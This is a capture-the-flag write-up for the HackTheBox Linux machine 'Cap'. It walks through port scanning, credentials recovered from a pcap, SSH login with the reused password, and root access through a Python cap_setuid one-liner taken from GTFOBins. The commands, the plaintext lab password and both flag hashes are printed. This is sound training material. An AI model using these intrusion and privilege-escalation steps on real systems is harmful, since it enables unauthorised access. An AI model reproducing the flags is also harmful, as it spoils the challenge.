Cap

Linux box on HTB.

Enumeration:

Port Scanning:

As always we are going to start with scaning the machine to find open ports via nmap:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Cap]
└─$ sudo nmap -sCV -p- --min-rate 4000 -oA nmap/services -vv 10.129.6.226
Starting Nmap 7.95 ( https://nmap.org ) at 2026-01-21 22:47 EST
Nmap scan report for 10.129.6.226                                                                                                                                           
Host is up, received echo-reply ttl 63 (0.20s latency).                                                                                                                     
Scanned at 2026-01-21 22:47:58 EST for 84s                                                                                                                                  
Not shown: 65532 closed tcp ports (reset)                                                                                                                                   
PORT   STATE SERVICE REASON         VERSION                                                                                                                                 
21/tcp open  ftp     syn-ack ttl 63 vsftpd 3.0.3
22/tcp open  ssh     syn-ack ttl 63 OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 fa:80:a9:b2:ca:3b:88:69:a4:28:9e:39:0d:27:d5:75 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC2vrva1a+HtV5SnbxxtZSs+D8/EXPL2wiqOUG2ngq9zaPlF6cuLX3P2QYvGfh5bcAIVjIqNUmmc1eSHVxtbmNEQjyJdjZOP4i2IfX/RZUA18dWTfEWlNaoVDGBsc8zunvFk3
nkyaynnXmlH7n3BLb1nRNyxtouW+q7VzhA6YK3ziOD6tXT7MMnDU7CfG1PfMqdU297OVP35BODg1gZawthjxMi5i5R1g3nyODudFoWaHu9GZ3D/dSQbMAxsly98L1Wr6YJ6M6xfqDurgOAl9i6TZ4zx93c/h1MO+mKH7EobPR/ZW
rFGLeVFZbB6jYEflCty8W8Dwr7HOdF1gULr+Mj+BcykLlzPoEhD7YqjRBm8SHdicPP1huq+/3tN7Q/IOf68NNJDdeq6QuGKh1CKqloT/+QZzZcJRubxULUg8YLGsYUHd1umySv4cHHEXRl7vcZJst78eBqnYUtN3MweQr4ga1kQP
4YZK5qUQCTPPmrKMa9NPh1sjHSdS8IwiH12V0=
|   256 96:d8:f8:e3:e8:f7:71:36:c5:49:d5:9d:b6:a4:c9:0c (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBDqG/RCH23t5Pr9sw6dCqvySMHEjxwCfMzBDypoNIMIa8iKYAe84s/X7vDbA9T/vtGDYzS+fw8I5MAGpX8deeKI=
|   256 3f:d0:ff:91:eb:3b:f6:e1:9f:2e:8d:de:b3:de:b2:18 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPbLTiQl+6W0EOi8vS+sByUiZdBsuz0v/7zITtSuaTFH
80/tcp open  http    syn-ack ttl 63 Gunicorn
|_http-server-header: gunicorn
|_http-title: Security Dashboard
| http-methods: 
|_  Supported Methods: GET HEAD OPTIONS
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

We have only 3 open ports, ftp on port 21, ssh on port 22, and http on port 80.

Since nmap did not indicate that anonymous login is enabled we will overlook it.

HTTP (80):

Lets start by take a look at the website, and see how it functions:

We are logged in with no reason as nathan. Also this dashboard page is a static one.

Also static pages, with system commands being executed in the underlying operating system, and the result printed out to us, without any parameters we can send to try to manipulate it to get command execution.

Here we have some sort of packets which we can download, and in the url it referes to data id 1, so we can also try others like 0, or 2.

We have something under 0 as well, but nothing further after 1.

I downloaded both files, lets inspect them to find anything useful to us.

Wireshark:

1.pcap:

It has nothing, only html pages intercepted.

0.pcap:

Open up the file with wireshark:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Cap]
└─$ wireshark 0.pcap

Lets find what protocol do we have in this packet from within protocol hirarchy:

Interestingly we have ftp data being captured, and as we all know ftp is not a secure option to use, and we can use other options to mitigate interceptions like sftp, etc.

Right-click follow stream on an ftp packet:

FTP (21):

Lets authenticate to ftp with those credentials:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Cap]
└─$ ftp nathan@10.129.6.226
Connected to 10.129.6.226.
220 (vsFTPd 3.0.3)
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -la
229 Entering Extended Passive Mode (|||52048|)
150 Here comes the directory listing.
drwxr-xr-x    3 1001     1001         4096 May 27  2021 .
drwxr-xr-x    3 0        0            4096 May 23  2021 ..
lrwxrwxrwx    1 0        0               9 May 15  2021 .bash_history -> /dev/null
-rw-r--r--    1 1001     1001          220 Feb 25  2020 .bash_logout
-rw-r--r--    1 1001     1001         3771 Feb 25  2020 .bashrc
drwx------    2 1001     1001         4096 May 23  2021 .cache
-rw-r--r--    1 1001     1001          807 Feb 25  2020 .profile 
lrwxrwxrwx    1 0        0               9 May 27  2021 .viminfo -> /dev/null     
-r--------    1 1001     1001           33 Jan 22 03:46 user.txt
226 Directory send OK.                                                                
ftp> cd ..                      
250 Directory successfully changed.
ftp> ls                                
229 Entering Extended Passive Mode (|||46589|)                                        
150 Here comes the directory listing.
drwxr-xr-x    3 1001     1001         4096 May 27  2021 nathan
226 Directory send OK.               
ftp> exit                           
221 Goodbye.

We can see it is mirroring the underlying machine, and we can access system files.

Lets try whether those credentials were reused with ssh:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Cap]
└─$ nxc ssh 10.129.6.226 -u nathan -p 'Buck3tH4TF0RM3!'            
SSH         10.129.6.226    22     10.129.6.226     [*] SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.2
SSH         10.129.6.226    22     10.129.6.226     [+] nathan:Buck3tH4TF0RM3!  Linux - Shell access!

Indeed we have access.

SSH (22):

SSH to the server:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Cap]
└─$ ssh nathan@10.129.6.226
The authenticity of host '10.129.6.226 (10.129.6.226)' can't be established.
ED25519 key fingerprint is: SHA256:UDhIJpylePItP3qjtVVU+GnSyAZSr+mZKHzRoKcmLUI
This key is not known by any other names.                                             
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.129.6.226' (ED25519) to the list of known hosts.
** WARNING: connection is not using a post-quantum key exchange algorithm.
** This session may be vulnerable to "store now, decrypt later" attacks.
** The server may need to be upgraded. See https://openssh.com/pq.html
nathan@10.129.6.226's password: Buck3tH4TF0RM3!
Welcome to Ubuntu 20.04.2 LTS (GNU/Linux 5.4.0-80-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Thu Jan 22 03:57:23 UTC 2026
  
<snipped>
nathan@cap:~$

Post-Exploitation:

Do some local enumeration:

nathan@cap:~$ ls -la
total 28
drwxr-xr-x 3 nathan nathan 4096 May 27  2021 .
drwxr-xr-x 3 root   root   4096 May 23  2021 ..
lrwxrwxrwx 1 root   root      9 May 15  2021 .bash_history -> /dev/null
-rw-r--r-- 1 nathan nathan  220 Feb 25  2020 .bash_logout
-rw-r--r-- 1 nathan nathan 3771 Feb 25  2020 .bashrc
drwx------ 2 nathan nathan 4096 May 23  2021 .cache
-rw-r--r-- 1 nathan nathan  807 Feb 25  2020 .profile
lrwxrwxrwx 1 root   root      9 May 27  2021 .viminfo -> /dev/null
-r-------- 1 nathan nathan   33 Jan 22 03:46 user.txt

We can not execute commands with sudo as nathan:

nathan@cap:~$ sudo -l
[sudo] password for nathan: 
Sorry, user nathan may not run sudo on cap.

Lets find out what suid binaries we have:

nathan@cap:~$ find / -perm -u=s -type f 2>/dev/null | grep -v snap
/usr/bin/umount
/usr/bin/newgrp
/usr/bin/pkexec
/usr/bin/mount
/usr/bin/gpasswd
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/sudo
/usr/bin/at
/usr/bin/chsh
/usr/bin/su
/usr/bin/fusermount
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper 
/usr/lib/eject/dmcrypt-get-device

None could help.

We can notice the name of the machine cap, maybe this is a hint to capabilities:

nathan@cap:~$ getcap -r / 2>/dev/null
/usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip
/usr/bin/ping = cap_net_raw+ep
/usr/bin/traceroute6.iputils = cap_net_raw+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep

Here we have python with file capabilities enabled, that allows python to change its uid, therefor can allow any user to escalate his privileges.

We can search online for python commands, or from gtfobins as always:

python | GTFOBinsgtfobins.org

Execute that command:

nathan@cap:~$ /usr/bin/python3.8 -c 'import os; os.setuid(0); os.execl("/bin/sh", "sh")'
# whoami
root

We are root.

Get the flags:

nathan@cap:~$ cat user.txt                                                                                                                                                  
473ad4c57b0f565f262485fa1c26baf0
# cat root.txt
8e9a680ac44815519a99ceb271636d81

PreviousKeeper NextTryHackMe

Last updated 15 days ago

hashtagEnumeration:

hashtagPort Scanning:

hashtagHTTP (80):

hashtagWireshark:

hashtag1.pcap:

hashtag0.pcap:

hashtagFTP (21):

hashtagSSH (22):

hashtagPost-Exploitation: